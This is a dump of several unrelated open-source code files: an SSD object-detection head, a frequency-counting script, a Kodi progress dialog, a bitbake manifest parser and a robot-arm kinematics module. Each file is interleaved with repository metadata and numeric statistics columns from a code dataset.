self.size = cfg.INPUT.SIZE
def forward(self, features, targets=None):
cls_logits, bbox_pred = self.predictor(features)
if self.training:
return self._forward_train(cls_logits, bbox_pred, targets)
else:
return self._forward_test(cls_logits, bbox_pred)
def _forward_train(self, cls_logits, bbox_pred, targets):
gt_boxes, gt_labels = targets[0], targets[1]
cls_loss, reg_loss = self.loss_evaluator(cls_logits, bbox_pred, gt_labels, gt_boxes)
loss_dict = dict(
cls_loss=cls_loss,
reg_loss=reg_loss,
)
return {}, loss_dict
def _forward_test(self, cls_logits, bbox_pred):
anchors = self.anchor_generator.generate_anchors()
anchors = anchors.to(cls_logits.device)
scores = F.softmax(cls_logits, dim=2)
boxes = bbox.convert_locations_to_boxes(
bbox_pred,
anchors,
self.center_variance,
self.size_variance
)
boxes = bbox.xywh2xyxy(boxes)
detections = self.post_processor(boxes, scores)
return detections, {}
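A construction sketch for the head above; the config node and channel list are assumptions (any yacs-style cfg exposing the MODEL.* and INPUT.* keys used above would do), and the channel counts are the conventional SSD300 values, not values taken from this repository:

head = SSDHead(cfg, in_channels=[512, 1024, 512, 256, 256, 256])
head.eval()                         # switch to the inference path
detections, _ = head(features)      # features: per-level backbone feature maps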
| 35.87931
| 96
| 0.675156
| 266
| 2,081
| 4.954887
| 0.285714
| 0.054628
| 0.059181
| 0.07739
| 0.10091
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003824
| 0.246036
| 2,081
| 57
| 97
| 36.508772
| 0.836201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0
| 0.142857
| 0
| 0.326531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e42bcb647690572f850059e2f35498edac0af13
| 415
|
py
|
Python
|
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
"""Find max element"""
#!/usr/bin/env python3
"""Find max element"""
import random
from collections import Counter
numbers = [random.randrange(1, 15) for _ in range(10)]
def most_frequent(values):
occurrence_count = Counter(values)
return occurrence_count.most_common()
frequent_number, frequency = most_frequent(numbers)[0]
print(f"List {numbers}: \nMost frequent number: {frequent_number} \nFrequency: {frequency}")
| 27.666667
| 88
| 0.742169
| 57
| 415
| 5.280702
| 0.614035
| 0.139535
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019284
| 0.125301
| 415
| 14
| 89
| 29.642857
| 0.809917
| 0.091566
| 0
| 0
| 0
| 0
| 0.223496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4b385ebb874ffc51cb3af951c49e948dbf2c97
| 1,659
|
py
|
Python
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 105
|
2015-11-28T00:03:11.000Z
|
2021-05-05T20:47:42.000Z
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 918
|
2015-11-28T14:12:40.000Z
|
2022-03-23T20:24:49.000Z
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 111
|
2015-12-01T14:06:10.000Z
|
2020-08-01T10:44:39.000Z
|
# -*- coding: utf-8 -*-
import xbmcgui
class DialogProgress:
def __init__(self):
self.dlg = xbmcgui.DialogProgress()
self.__reset__()
def __reset__(self):
self.head = ''
self.firstline = ''
self.secondline = None
self.thirdline = None
self.percent = 0
def isCanceled(self):
return self.dlg.iscanceled()
def update(self, percent=None, firstline=None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if percent:
self.percent = percent
if self.secondline and self.thirdline:
self.dlg.update(self.percent, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.update(self.percent, self.firstline, self.secondline)
else:
self.dlg.update(self.percent, self.firstline)
def create(self, head, firstline=None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if self.secondline and self.thirdline:
self.dlg.create(head, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.create(head, self.firstline, self.secondline)
else:
self.dlg.create(head, self.firstline)
def close(self):
self.dlg.close()
self.__reset__()
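A minimal sketch of the intended call pattern inside a Kodi addon (the strings and step count are illustrative):

dlg = DialogProgress()
dlg.create('SportsDevil', 'Loading...')
for i in range(1, 101):
    if dlg.isCanceled():
        break
    dlg.update(percent=i, secondline='step %d' % i)
dlg.close()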
| 28.603448
| 90
| 0.603978
| 174
| 1,659
| 5.666667
| 0.16092
| 0.156187
| 0.086207
| 0.136917
| 0.718053
| 0.686613
| 0.663286
| 0.610548
| 0.492901
| 0.423935
| 0
| 0.001721
| 0.299578
| 1,659
| 58
| 91
| 28.603448
| 0.846816
| 0.012658
| 0
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.022727
| 0.022727
| 0.204545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4b7d98eca7eba2d20b079df0bbd0eb0b4e7a32
| 3,828
|
py
|
Python
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 3
|
2015-05-25T10:56:21.000Z
|
2021-11-27T17:25:26.000Z
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 1
|
2021-11-27T17:24:21.000Z
|
2021-11-27T17:24:21.000Z
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 2
|
2016-08-13T08:40:48.000Z
|
2021-03-26T03:01:03.000Z
|
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
# Copyright (C) 2003, 2004 Chris Larson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os, sys
import bb, bb.data
def getfields(line):
fields = {}
fieldmap = ( "pkg", "src", "dest", "type", "mode", "uid", "gid", "major", "minor", "start", "inc", "count" )
for f in xrange(len(fieldmap)):
fields[fieldmap[f]] = None
if not line:
return None
splitline = line.split()
if not len(splitline):
return None
try:
for f in xrange(len(fieldmap)):
if splitline[f] == '-':
continue
fields[fieldmap[f]] = splitline[f]
except IndexError:
pass
return fields
def parse(mfile, d):
manifest = []
while 1:
line = mfile.readline()
if not line:
break
if line.startswith("#"):
continue
fields = getfields(line)
if not fields:
continue
manifest.append(fields)
return manifest
def emit(func, manifest, d):
#str = "%s () {\n" % func
str = ""
for line in manifest:
emittedline = emit_line(func, line, d)
if not emittedline:
continue
str += emittedline + "\n"
# str += "}\n"
return str
def mangle(func, line, d):
import copy
newline = copy.copy(line)
src = bb.data.expand(newline["src"], d)
if src:
if not os.path.isabs(src):
src = "${WORKDIR}/" + src
dest = newline["dest"]
if not dest:
return
if dest.startswith("/"):
dest = dest[1:]
if func is "do_install":
dest = "${D}/" + dest
elif func is "do_populate":
dest = "${WORKDIR}/install/" + newline["pkg"] + "/" + dest
elif func is "do_stage":
varmap = {}
varmap["${bindir}"] = "${STAGING_DIR}/${HOST_SYS}/bin"
varmap["${libdir}"] = "${STAGING_DIR}/${HOST_SYS}/lib"
varmap["${includedir}"] = "${STAGING_DIR}/${HOST_SYS}/include"
varmap["${datadir}"] = "${STAGING_DATADIR}"
matched = 0
for key in varmap.keys():
if dest.startswith(key):
dest = varmap[key] + "/" + dest[len(key):]
matched = 1
if not matched:
newline = None
return
else:
newline = None
return
newline["src"] = src
newline["dest"] = dest
return newline
def emit_line (func, line, d):
import copy
newline = copy.deepcopy(line)
newline = mangle(func, newline, d)
if not newline:
return None
str = ""
type = newline["type"]
mode = newline["mode"]
src = newline["src"]
dest = newline["dest"]
if type is "d":
str = "install -d "
if mode:
str += "-m %s " % mode
str += dest
elif type is "f":
if not src:
return None
if dest.endswith("/"):
str = "install -d "
str += dest + "\n"
str += "install "
else:
str = "install -D "
if mode:
str += "-m %s " % mode
str += src + " " + dest
del newline
return str
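# Minimal usage sketch (illustrative values, not part of the original file; the
# 12-column layout follows the fieldmap above, with '-' marking an empty field):
if __name__ == "__main__":
    sample = "mypkg files/foo ${bindir}/foo f 0755 - - - - - - -"
    print(getfields(sample)["dest"])   # -> ${bindir}/foo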
| 26.4
| 112
| 0.544148
| 475
| 3,828
| 4.36
| 0.353684
| 0.026557
| 0.018831
| 0.027523
| 0.16562
| 0.106229
| 0.056977
| 0.028006
| 0.028006
| 0.028006
| 0
| 0.011214
| 0.324451
| 3,828
| 144
| 113
| 26.583333
| 0.789637
| 0.204545
| 0
| 0.308411
| 0
| 0
| 0.119669
| 0.031074
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046729
| false
| 0.009346
| 0.037383
| 0
| 0.196262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4e48bf1020755d5adf17a1c4aa85cf738609d6
| 23,209
|
py
|
Python
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 7
|
2015-08-25T00:28:49.000Z
|
2020-04-14T22:58:51.000Z
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 89
|
2020-08-03T16:54:08.000Z
|
2022-03-09T19:56:19.000Z
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 4
|
2016-10-05T17:54:26.000Z
|
2020-08-06T15:37:09.000Z
|
'''
Classes implementing various kinematic chains. This module is perhaps mis-located
as it does not have a direct BMI role but rather contains code which is useful in
supporting BMI control of kinematic chains.
This code depends on the 'robot' module (https://github.com/sgowda/robotics_toolbox)
'''
import numpy as np
try:
import robot
except ImportError:
import warnings
warnings.warn("The 'robot' module cannot be found! See https://github.com/sgowda/robotics_toolbox")
import matplotlib.pyplot as plt
from collections import OrderedDict
import time
pi = np.pi
class KinematicChain(object):
'''
Arbitrary kinematic chain (i.e. spherical joint at the beginning of
each joint)
'''
def __init__(self, link_lengths=[10., 10.], name='', base_loc=np.array([0., 0., 0.]), rotation_convention=1):
'''
Docstring
Parameters
----------
link_lengths: iterable
Lengths of all the distances between joints
base_loc: np.array of shape (3,), default=np.array([0, 0, 0])
Location of the base of the kinematic chain in an "absolute" reference frame
'''
self.n_links = len(link_lengths)
self.link_lengths = link_lengths
self.base_loc = base_loc
assert rotation_convention in [-1, 1]
self.rotation_convention = rotation_convention
# Create the robot object. Override for child classes with different types of joints
self._init_serial_link()
self.robot.name = name
def _init_serial_link(self):
links = []
for link_length in self.link_lengths:
link1 = robot.Link(alpha=-pi/2)
link2 = robot.Link(alpha=pi/2)
link3 = robot.Link(d=-link_length)
links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
Override in child classes to perform static transforms on joint angle inputs. If some
joints are always static (e.g., if the chain only operates in a plane)
        this keeps the joint angle specification uncluttered.
'''
return self.rotation_convention * joint_angles
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def plot(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
self.robot.plot(joint_angles)
def forward_kinematics(self, joint_angles, **kwargs):
'''
Calculate forward kinematics using D-H parameter convention
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
t, allt = self.robot.fkine(joint_angles, **kwargs)
self.joint_angles = joint_angles
self.t = t
self.allt = allt
return t, allt
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def inverse_kinematics(self, target_pos, q_start=None, method='pso', **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
if q_start == None:
q_start = self.random_sample()
return self.inverse_kinematics_pso(target_pos, q_start, **kwargs)
# ik_method = getattr(self, 'inverse_kinematics_%s' % method)
# return ik_method(q_start, target_pos)
def inverse_kinematics_grad_descent(self, target_pos, starting_config, n_iter=1000, verbose=False, eps=0.01, return_path=False):
'''
        Inverse kinematics via Jacobian-based gradient descent. For redundant
        kinematic chains an infinite number of inverse kinematics solutions
        exist, so the result depends on the starting configuration.
Docstring
Parameters
----------
Returns
-------
'''
q = starting_config
start_time = time.time()
endpoint_traj = np.zeros([n_iter, 3])
joint_limited = np.zeros(len(q))
for k in range(n_iter):
# print k
# calc endpoint position of the manipulator
endpoint_traj[k] = self.endpoint_pos(q)
current_cost = np.linalg.norm(endpoint_traj[k] - target_pos, 2)
if current_cost < eps:
print("Terminating early")
break
# calculate the jacobian
J = self.jacobian(q)
J_pos = J[0:3,:]
# for joints that are at their limit, zero out the jacobian?
# J_pos[:, np.nonzero(self.calc_full_joint_angles(joint_limited))] = 0
# take a step from the current position toward the target pos using the inverse Jacobian
J_inv = np.linalg.pinv(J_pos)
# J_inv = J_pos.T
xdot = (target_pos - endpoint_traj[k])#/np.linalg.norm(endpoint_traj[k] - target_pos)
# if current_cost < 3 or k > 10:
# stepsize = 0.001
# else:
# stepsize = 0.01
# xdot = (endpoint_traj[k] - target_pos)/np.linalg.norm(endpoint_traj[k] - target_pos)
qdot = 0.001*np.dot(J_inv, xdot)
qdot = self.full_angles_to_subset(np.array(qdot).ravel())
q += qdot
# apply joint limits
q, joint_limited = self.apply_joint_limits(q)
end_time = time.time()
runtime = end_time - start_time
if verbose:
print("Runtime: %g" % runtime)
print("# of iterations: %g" % k)
if return_path:
return q, endpoint_traj[:k]
else:
return q
def jacobian(self, joint_angles):
'''
Return the full jacobian
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
J = self.robot.jacobn(joint_angles)
return J
def endpoint_pos(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
t, allt = self.forward_kinematics(joint_angles)
pos_rel_to_base = np.array(t[0:3,-1]).ravel()
return pos_rel_to_base + self.base_loc
def ik_cost(self, q, q_start, target_pos, weight=100):
'''
Docstring
Parameters
----------
Returns
-------
'''
q_diff = q - q_start
return np.linalg.norm(q_diff[0:2]) + weight*np.linalg.norm(self.endpoint_pos(q) - target_pos)
def inverse_kinematics_pso(self, target_pos, q_start, time_limit=np.inf, verbose=False, eps=0.5, n_particles=10, n_iter=10):
'''
Docstring
Parameters
----------
Returns
-------
'''
# Initialize the particles;
n_joints = self.n_joints
particles_q = np.tile(q_start, [n_particles, 1])
# if 0:
# # initialize the velocities to be biased around the direction the jacobian tells you is correct
# current_pos = self.endpoint_pos(q_start)
# int_displ = target_pos - current_pos
# print int_displ, target_pos
# J = self.jacobian(q_start)
# endpoint_vel = np.random.randn(n_particles, 3)# + int_displ
# particles_v = np.dot(J[0:3,1::3].T, endpoint_vel.T).T
# else:
# # initialize particle velocities randomly
particles_v = np.random.randn(n_particles, n_joints) #/ np.array([1., 1., 1, 1]) #np.array(self.link_lengths)
cost_fn = lambda q: self.ik_cost(q, q_start, target_pos)
gbest = particles_q.copy()
gbestcost = np.array(list(map(cost_fn, gbest)))
pbest = gbest[np.argmin(gbestcost)]
pbestcost = cost_fn(pbest)
min_limits = np.array([x[0] for x in self.joint_limits])
max_limits = np.array([x[1] for x in self.joint_limits])
min_limits = np.tile(min_limits, [n_particles, 1])
max_limits = np.tile(max_limits, [n_particles, 1])
start_time = time.time()
for k in range(n_iter):
if time.time() - start_time > time_limit:
break
# update positions of particles
particles_q += particles_v
# apply joint limits
min_viol = particles_q < min_limits
max_viol = particles_q > max_limits
particles_q[min_viol] = min_limits[min_viol]
particles_q[max_viol] = max_limits[max_viol]
# update the costs
costs = np.array(list(map(cost_fn, particles_q)))
# update the 'bests'
gbest[gbestcost > costs] = particles_q[gbestcost > costs]
gbestcost[gbestcost > costs] = costs[gbestcost > costs]
idx = np.argmin(gbestcost)
pbest = gbest[idx]
pbestcost = gbestcost[idx]
# update the velocity
phi1 = 1#np.random.rand()
phi2 = 1#np.random.rand()
w=0.25
c1=0.5
c2=0.25
particles_v = w*particles_v + c1*phi1*(pbest - particles_q) + c2*phi2*(gbest - particles_q)
error = np.linalg.norm(self.endpoint_pos(pbest) - target_pos)
if error < eps:
break
end_time = time.time()
if verbose: print("Runtime = %g, error = %g, n_iter=%d" % (end_time-start_time, error, k))
return pbest
def spatial_positions_of_joints(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
_, allt = self.forward_kinematics(joint_angles, return_allt=True)
pos = (allt[0:3, -1,:].T + self.base_loc).T
# pos = np.hstack([np.zeros([3,1]), pos])
return pos
class PlanarXZKinematicChain(KinematicChain):
'''
Kinematic chain restricted to movement in the XZ-plane
'''
def _init_serial_link(self):
base = robot.Link(alpha=pi/2, d=0, a=0)
links = [base]
for link_length in self.link_lengths:
link1 = robot.Link(alpha=0, d=0, a=link_length)
links.append(link1)
# link2 = robot.Link(alpha=pi/2)
# link3 = robot.Link(d=-link_length)
# links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
# links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
only some joints rotate in the planar kinematic chain
Parameters
----------
joint_angles : np.ndarray of shape (self.n_links)
Joint angles without the angle for the base link, which is fixed at 0
Returns
-------
joint_angles_full : np.ndarray of shape (self.n_links+1)
Add on the 0 at the proximal end for the base link angle
'''
if not len(joint_angles) == self.n_links:
raise ValueError("Incorrect number of joint angles specified!")
# # There are really 3 angles per joint to allow 3D rotation at each joint
# joint_angles_full = np.zeros(self.n_links * 3)
# joint_angles_full[1::3] = joint_angles
joint_angles_full = np.hstack([0, joint_angles])
return self.rotation_convention * joint_angles_full
def random_sample(self):
'''
Sample the joint configuration space within the limits of each joint
Parameters
----------
None
Returns
-------
None
'''
if hasattr(self, 'joint_limits'):
joint_limits = self.joint_limits
else:
joint_limits = [(-np.pi, np.pi)] * self.n_links
q_start = []
for lim_min, lim_max in joint_limits:
q_start.append(np.random.uniform(lim_min, lim_max))
return np.array(q_start)
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
# return joint_angles[1::3]
return joint_angles[1:]
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
if not hasattr(self, 'joint_limits'):
return joint_angles
else:
angles = []
limit_hit = []
for angle, (lim_min, lim_max) in zip(joint_angles, self.joint_limits):
limit_hit.append(angle < lim_min or angle > lim_max)
angle = max(lim_min, angle)
angle = min(angle, lim_max)
angles.append(angle)
return np.array(angles), np.array(limit_hit)
@property
def n_joints(self):
'''
In a planar arm, the number of joints equals the number of links
'''
return len(self.link_lengths)
def spatial_positions_of_joints(self, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
pos_all_joints = super(PlanarXZKinematicChain, self).spatial_positions_of_joints(*args, **kwargs)
return pos_all_joints #(pos_all_joints[:,::3].T + self.base_loc).T
def create_ik_subchains(self):
'''
Docstring
Parameters
----------
Returns
-------
'''
proximal_link_lengths = self.link_lengths[:2]
distal_link_lengths = self.link_lengths[2:]
self.proximal_chain = PlanarXZKinematicChain2Link(proximal_link_lengths)
if len(self.link_lengths) > 2:
self.distal_chain = PlanarXZKinematicChain(distal_link_lengths)
else:
self.distal_chain = None
def inverse_kinematics(self, target_pos, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
target_pos = target_pos.copy()
target_pos -= self.base_loc
if not hasattr(self, 'proximal_chain') or not hasattr(self, 'distal_chain'):
self.create_ik_subchains()
if len(self.link_lengths) > 2:
distal_angles = kwargs.pop('distal_angles', None)
if distal_angles is None:
# Sample randomly from the joint limits (-pi, pi) if not specified
if not hasattr(self, 'joint_limits') or len(self.joint_limits) < len(self.link_lengths):
joint_limits = [(-pi, pi)] * len(self.distal_chain.link_lengths)
else:
joint_limits = self.joint_limits[2:]
distal_angles = np.array([np.random.uniform(*limits) for limits in joint_limits])
distal_displ = self.distal_chain.endpoint_pos(distal_angles)
proximal_endpoint_pos = target_pos - distal_displ
proximal_angles = self.proximal_chain.inverse_kinematics(proximal_endpoint_pos).ravel()
angles = distal_angles.copy()
joint_angles = proximal_angles.tolist()
angles[0] -= np.sum(proximal_angles)
ik_angles = np.hstack([proximal_angles, angles])
ik_angles = np.array([np.arctan2(np.sin(angle), np.cos(angle)) for angle in ik_angles])
return ik_angles
else:
return self.proximal_chain.inverse_kinematics(target_pos).ravel()
def jacobian(self, theta, old=False):
'''
Returns the first derivative of the forward kinematics function for x and z endpoint positions:
[[dx/dtheta_1, ..., dx/dtheta_N]
[dz/dtheta_1, ..., dz/dtheta_N]]
Parameters
----------
theta : np.ndarray of shape (N,)
Valid configuration for the arm (the jacobian calculations are specific to the configuration of the arm)
Returns
-------
J : np.ndarray of shape (2, N)
Manipulator jacobian in the format above
'''
if old:
# Calculate jacobian based on hand calculation specific to this type of chain
l = self.link_lengths
N = len(theta)
J = np.zeros([2, len(l)])
for m in range(N):
for i in range(m, N):
J[0, m] += -l[i]*np.sin(sum(self.rotation_convention*theta[:i+1]))
J[1, m] += l[i]*np.cos(sum(self.rotation_convention*theta[:i+1]))
return J
else:
# Use the robotics toolbox and the generic D-H convention jacobian
J = self.robot.jacob0(self.calc_full_joint_angles(theta))
return np.array(J[[0,2], 1:])
def endpoint_potent_null_split(self, q, vel, return_J=False):
'''
(Approximately) split joint velocities into an endpoint potent component,
which moves the endpoint, and an endpoint null component which only causes self-motion
'''
J = self.jacobian(q)
J_pinv = np.linalg.pinv(J)
J_task = np.dot(J_pinv, J)
J_null = np.eye(self.n_joints) - J_task
vel_task = np.dot(J_task, vel)
vel_null = np.dot(J_null, vel)
if return_J:
return vel_task, vel_null, J, J_pinv
else:
return vel_task, vel_null
def config_change_nullspace_workspace(self, config1, config2):
'''
For two configurations, determine how much joint displacement is in the "null" space and how much is in the "task" space
Docstring
Parameters
----------
Returns
-------
'''
config = config1
vel = config2 - config1
endpt1 = self.endpoint_pos(config1)
endpt2 = self.endpoint_pos(config2)
task_displ = np.linalg.norm(endpt1 - endpt2)
# compute total displ of individual joints
total_joint_displ = 0
n_joints = len(config1)
for k in range(n_joints):
jnt_k_vel = np.zeros(n_joints)
jnt_k_vel[k] = vel[k]
single_joint_displ_pos = self.endpoint_pos(config + jnt_k_vel)
total_joint_displ += np.linalg.norm(endpt1 - single_joint_displ_pos)
return task_displ, total_joint_displ
def detect_collision(self, theta, obstacle_pos):
'''
Detect a collision between the chain and a circular object
'''
spatial_joint_pos = self.spatial_positions_of_joints(theta).T + self.base_loc
plant_segments = [(x, y) for x, y in zip(spatial_joint_pos[:-1], spatial_joint_pos[1:])]
dist_to_object = np.zeros(len(plant_segments))
for k, segment in enumerate(plant_segments):
dist_to_object[k] = point_to_line_segment_distance(obstacle_pos, segment)
return dist_to_object
def plot_joint_pos(self, joint_pos, ax=None, flip=False, **kwargs):
        if ax is None:
plt.figure()
ax = plt.subplot(111)
if isinstance(joint_pos, dict):
joint_pos = np.vstack(list(joint_pos.values()))
elif isinstance(joint_pos, np.ndarray) and np.ndim(joint_pos) == 1:
joint_pos = joint_pos.reshape(1, -1)
elif isinstance(joint_pos, tuple):
joint_pos = np.array(joint_pos).reshape(1, -1)
for pos in joint_pos:
spatial_pos = self.spatial_positions_of_joints(pos).T
shoulder_anchor = np.array([2., 0., -15.])
spatial_pos = spatial_pos# + shoulder_anchor
if flip:
ax.plot(-spatial_pos[:,0], spatial_pos[:,2], **kwargs)
else:
ax.plot(spatial_pos[:,0], spatial_pos[:,2], **kwargs)
return ax
def point_to_line_segment_distance(point, segment):
'''
Determine the distance between a point and a line segment. Used to determine collisions between robot arm links and virtual obstacles.
Adapted from http://stackoverflow.com/questions/849211/shortest-distance-between-a-point-and-a-line-segment
'''
v, w = segment
l2 = np.sum(np.abs(v - w)**2)
if l2 == 0:
return np.linalg.norm(v - point)
t = np.dot(point - v, w - v)/l2
if t < 0:
return np.linalg.norm(point - v)
elif t > 1:
return np.linalg.norm(point - w)
else:
projection = v + t*(w-v)
return np.linalg.norm(projection - point)
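# Quick sanity check for the helper above (illustrative values): the point
# (0, 1) lies exactly 1 unit from the segment joining (-1, 0) and (1, 0).
#   point_to_line_segment_distance(np.array([0., 1.]),
#                                  (np.array([-1., 0.]), np.array([1., 0.])))
#   # -> 1.0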
class PlanarXZKinematicChain2Link(PlanarXZKinematicChain):
''' Docstring '''
def __init__(self, link_lengths, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
        if len(link_lengths) != 2:
            raise ValueError("PlanarXZKinematicChain2Link requires exactly 2 link lengths!")
super(PlanarXZKinematicChain2Link, self).__init__(link_lengths, *args, **kwargs)
def inverse_kinematics(self, pos, **kwargs):
'''
Inverse kinematics for a two-link kinematic chain. These equations can be solved
deterministically.
Docstring
Parameters
----------
pos : np.ndarray of shape (3,)
Desired endpoint position where the coordinate system origin is the base of the arm. y coordinate must be 0
Returns
-------
np.ndarray of shape (2,)
Joint angles which yield the endpoint position with the forward kinematics of this manipulator
'''
pos -= self.base_loc
l_upperarm, l_forearm = self.link_lengths
if np.ndim(pos) == 1:
pos = pos.reshape(1,-1)
# require the y-coordinate to be 0, i.e. flat on the screen
x, y, z = pos[:,0], pos[:,1], pos[:,2]
assert np.all(np.abs(np.array(y)) < 1e-10)
L = np.sqrt(x**2 + z**2)
cos_el_pflex = (L**2 - l_forearm**2 - l_upperarm**2) / (2*l_forearm*l_upperarm)
cos_el_pflex[ (cos_el_pflex > 1) & (cos_el_pflex < 1 + 1e-9)] = 1
el_pflex = np.arccos(cos_el_pflex)
sh_pabd = np.arctan2(z, x) - np.arcsin(l_forearm * np.sin(np.pi - el_pflex) / L)
return np.array([sh_pabd, el_pflex])
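if __name__ == '__main__':
    # Minimal sketch (hypothetical link lengths; assumes the 'robot' toolbox is
    # importable): the planar 2-link chain has a closed-form IK solution.
    chain = PlanarXZKinematicChain2Link([10., 10.])
    angles = chain.inverse_kinematics(np.array([10., 0., 10.]))
    assert np.all(np.isfinite(angles))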
| 32.190014
| 138
| 0.561463
| 2,814
| 23,209
| 4.437811
| 0.160625
| 0.044923
| 0.035394
| 0.01065
| 0.275064
| 0.186339
| 0.120035
| 0.10418
| 0.092969
| 0.087524
| 0
| 0.014482
| 0.330561
| 23,209
| 721
| 139
| 32.190014
| 0.789277
| 0.270283
| 0
| 0.149502
| 0
| 0
| 0.022224
| 0
| 0
| 0
| 0
| 0
| 0.006645
| 1
| 0.10299
| false
| 0
| 0.023256
| 0
| 0.245847
| 0.013289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4e7f677ab2a0f132b93e4b1dfb1c29e362f6de
| 3,622
|
py
|
Python
|
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
